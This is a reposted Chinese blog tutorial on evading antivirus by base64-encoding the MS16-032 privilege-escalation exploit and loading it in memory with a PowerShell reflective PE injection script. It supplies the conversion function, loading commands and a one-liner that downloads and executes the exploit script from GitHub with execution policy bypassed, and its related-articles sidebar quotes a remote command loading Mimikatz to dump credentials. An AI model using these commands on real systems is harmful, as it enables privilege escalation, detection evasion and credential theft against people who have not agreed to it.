powershell中使用ReflectivePEInjection绕过杀毒

最新推荐文章于 2024-06-15 09:48:23 发布
最新推荐文章于 2024-06-15 09:48:23 发布
阅读量761 收藏
点赞数

640?wx_fmt=gif&wxfrom=5&wx_lazy=1


有时候,使用某些exp进行提权的时候,exp可能会被查杀,当然,有源码的话,我们可以在源码上进行修改进行免杀处理,但是今天介绍的是另外一只方法,即使用PEloader来加载exp。


powershell的PEloader在这里,查看代码我们可以看到,这个脚本使用非常简单,具体代码如下:


$PEBytes = [IO.File]::ReadAllBytes('DemoEXE.exe')
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4"



获取exp的字节流,之后再在内存中加载exp,所以思路也很简单,我们只需要把需要的exp转换成字符串,写入脚本,就可以构造一个powershell脚本。


这里整理了一个脚本方便转换:


function Convert-BinaryToString {
   [CmdletBinding()] param (
      [string] $FilePath
   )
   try {
      $ByteArray = [System.IO.File]::ReadAllBytes($FilePath);
   }
   catch {
      throw "Failed to read file. Ensure that you have permission to the file, and that the file path is correct.";
   }
   if ($ByteArray) {
      $Base64String = [System.Convert]::ToBase64String($ByteArray);
   }
   else {
      throw '$ByteArray is $null.';
   }
   $Base64String | set-content ("b64.txt")
}



使用zcgonvh的16032做演示。使用脚本转换:


PS C:\Users\evi1cg\Desktop\16_032> . .\Convert-BinaryToString.ps1
PS C:\Users\evi1cg\Desktop\16_032> Convert-BinaryToString -FilePath .\ms16-032_x64.exe


生成base64的字符串并存储在b64.txt中。

640?wx_fmt=jpeg


使用如下命令进行转换:


$InputString = "base64string"

$PEBytes = [System.Convert]::FromBase64String($InputString)



之后就可以使用

Invoke-ReflectivePEInjection -PEBytes $PEBytes


进行加载,最后分享一下最终的脚本:


E2P_MS16-032.ps1


使用方式为:

E2P_MS16-032 -Command '"net user"'

640?wx_fmt=jpeg



脚本GITHUB:


远程加载命令:640?wx_fmt=png

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/E2P_MS16-032.ps1');E2P_MS16-032 -Command '\"whoami\"'"

640?wx_fmt=jpeg

文章出处:Evi1cg's blog   

原文链接: https://evi1cg.me/archives/BypassAV_With_ReflectivePEInjection.html 

640?wx_fmt=jpeg

你可能喜欢

Meterpreter免杀技巧分享

打造“免杀”的恶意程序需要多久?用这个工具,只要几分钟

如何利用十行代码,绕过杀毒软件实现免杀?


640?wx_fmt=jpeg

黑白之道
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
powershell杀软,EDR检测
test1988x的博客
01-09 601
地址:https://github.com/PwnDexter/Invoke-EDRChecker powershell导入模块 PS C:\Users\Invoke-EDRChecker> Import-Module .\Invoke-EDRChecker.ps1 PS C:\Users\Invoke-EDRChecker> Invoke-EDRChecker ...
服务器进程专杀
01-22
有些进程就和病毒一样,没法删除,用此工具就可以解决。
Powershell免杀
mingyqf的博客
05-11 2431
Powershell免杀 本文作者:Chenw 本文链接:https://www.cnblogs.com/chen-w/p/14726549.html 0x01 前言 前几天搞一个站的时候,进入内网,想让内网一台机子powershell上线。然后被杀软拦截了,极其的不讲武德,想着我极强的朋友们白嫖个免杀的方法。 后面还是没有白嫖到,只好自己去研究学习一下了(针对CS的进行免杀,后面思想大同小异)于是做了这个小笔记。 0x02 Powershell免杀思路 先介绍一下powershell木马最常用的方式
探索尖端技术:SharpReflectivePEInjection,你的渗透测试新利器!
最新发布
gitblog_00072的博客
06-15 400
探索尖端技术:SharpReflectivePEInjection,你的渗透测试新利器! 项目地址:https://gitcode.com/cpu0x00/SharpReflectivePEInjection 在黑客防御与网络安全的世界,有效的渗透测试工具是安全专业人员的必备武器。今天,我们为你推荐一个强大的开源项目——SharpReflectivePEInjection,它是一个灵活且功能丰富...
PowerShell 安全专题之攻击检测篇
weixin_34041003的博客
09-25 1407
本文讲的是PowerShell 安全专题之攻击检测篇,PowerShell 从诞生至今,已经被大多数攻击者滥用在了各种攻击场景,如内网渗透,APT攻击甚至包括现在流行的勒索软件。PS之所以被广泛的“滥用”在攻击,就是因为PS的功能强大且调用方式十分灵活。随着利用PS进行攻击的趋势愈演愈烈,掌握有效的防御和检测PS攻击的方法是十分有必要的。 Pow...
恶意软件“八月”利用powershell进行无文件感染
weixin_34304013的博客
09-04 441
本文讲的是 恶意软件“八月”利用powershell进行无文件感染,Proofpoint安全研究专家提醒,一种叫做“八月”(August)的新型窃取信息恶意软件正利用Windows powershell脚本进行无文件感染并通过Word文档传播。 这个恶意软件是由高度个性化的TA530为载体来传播的,研究者表示,“八月”传播的目标是零售商的客服、管理人员...
bypass-clm:PowerShell受限语言模式绕过
05-24
在撰写本文时,我发现的唯一绕过方法是降级为PowerShell版本2或使用.Net的运行空间。 PowerShell版本2现在不再普遍可用,并且Runspaces本身不提供交互式界面。 该方法将提供完整的powershell会话,就像运行...
PowerShell使用正则表达式筛选数组实例
01-20
本文介绍PowerShell使用match操作符,配合正则表达式从数组筛选出想要的内容。 先看下面这个例子: 代码如下: PS C:\Users\Hong> (ipconfig) -match ‘IPv4’  IPv4 地址 . . . . . . . . . . . . : 192.168.1...
PowerShell使用return语句退出函数例子
01-20
本文介绍在自定义PowerShell函数时,可以使用return语句来退出函数,同时return语句也可以返回值给函数的调用者。 使用return语句来直接退出函数。看一个退出函数的例子: 代码如下: function Get-NamedProcess { ...
Powershell使用WMI工具例子
01-20
支持所有版本 WMI是一个强大的技术:只需要简单的指定一个WMI类名就能返回它类的所有实例: 代码如下: PS> Get-WmiObject -Class Win32_BIOS ...Manufacturer : LENOVO ...SerialNumber : 1006250300406 ...
如何防范PowerShell代码注入漏洞绕过受限语言模式
09-21
### 如何防范PowerShell代码注入漏洞绕过受限语言模式 #### 一、PowerShell与受限语言模式概述 PowerShell作为一种强大的脚本语言,在Windows环境扮演着重要的角色,它不仅可以用于自动化任务,还提供了丰富的...
无文件渗透实验
一个码农的笔记
03-09 4334
无文件渗透实验—这是60字节webshell的杂技前几天看了一个文章《全球上百家银行和金融机构感染了一种“无文件”恶意程序,几乎无法检测》 觉得powershell很是神奇,自己希望亲手实验一下,以最大程度还原“无文件”攻击方式拓扑设计 拓扑介绍: 其192.168.1.0/24模拟的是公网的环境 172.21.132.0/24模拟的是企业内网的环境 边界web服务器双网卡(公网的:192.1
PowerShell脚本免杀/bypass/绕过杀毒软件
wdsj_xh的博客
05-12 2295
项目地址:https://github.com/the-xentropy/xencrypt 原文链接:http://caidaome.com/?post=246 Xencrypt是一个PowerShell加密程序,以达到某些场景下免杀/bypass/绕过杀毒软件的效果。厌倦了浪费大量时间混淆诸如invoke-mimikatz之类的PowerShell脚本,以至于无论如何都无法检测到它们?如果您可以采用任何脚本并自动且几乎不费力地生成几乎无限数量的变体来击败基于签名的防病毒检测机制,那岂不是很棒吗?.
powershell加载mimikatz 抓密码 (无文件,躲过杀软,可以nc回显)
xiaoziabc的博客
07-21 2306
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"  powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-...
PowerShell安全专题之攻击工具篇
weixin_34092455的博客
09-25 922
本文讲的是PowerShell安全专题之攻击工具篇, PowerShell 成为攻击工具的演变过程 PowerShell 是一个内置在每个受支持的Windows版本 (Windows 7 / Windows 2008 R2 和更高版本)的命令行程序,它能够提供令人难以置信的灵活性和功能化管理 Windows 系统的能力。这种能力使得 PowerShe...
反射式dll注入(ReflectiveDLLInjection)
随心动,随风行
04-30 3855
学习基于stephenfewer大佬的项目:ReflectiveDLLInjection 有兴趣的同学可以下载研究
.exp文件_有趣的命令行系列——利用PEloader加载exp从而绕过杀毒软件
weixin_39952074的博客
11-27 398
黑客工具是渗透手在日常工作必备的,很多黑客工具其实并不是木马或病毒,但是也被杀毒软件查杀,所以让自己手头的黑客工具躲过杀软也是渗透手的必要技能。Poweshell有一个peloader脚本,地址在https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection...
如何用Powershell PE注入弹你一脸计算器
xiaoi123的博客
05-10 1590
i春秋超级版主:浅安今天我们将看看以编程的方式把shellcode注入到磁盘上的PE可执行文件,请注意我们仅仅只是在谈论exe文件,PE文件格式包括许多其他扩展(dll,ocx,sys,cpl,fon,…)。手动执行此操作非常简单,关键点在于需要确保PE的功能没有改变,以免引起怀疑。但手动注入往往不实用,你需要先复制一份PE,在你自己主机上更改它,然后替换目标机器的该文件。为了简化这个过程,我...
powershell之ms16-032复现
qq_45300786的博客
12-14 665
因为楼主没有合适的靶机,就简单说一下环境要求。 1、存在ms16-032的靶机 2、ms16-032的ps1脚本 3、powershell默认是不能运行脚本的,请自己手动开启(百度) 4、ms16-032脚本:https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1 参考文章 http://www.96sec.org/blog/post/209.html https://blo
powershell使用&是什么意思
06-14
PowerShell ,& 符号可以用来执行命令、脚本或者可执行文件。它相当于在命令行直接输入要执行的命令或程序名。例如,如果要执行一个命令或脚本文件,可以使用以下语法: ``` & command & script.ps1 ``` 如果要执行一个可执行文件,则需要指定文件的完整路径,例如: ``` & "C:\Program Files\MyApp\MyApp.exe" ``` 注意,& 符号后面的命令或文件名需要用引号括起来,以避免解释器将其的空格解析为命令参数
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值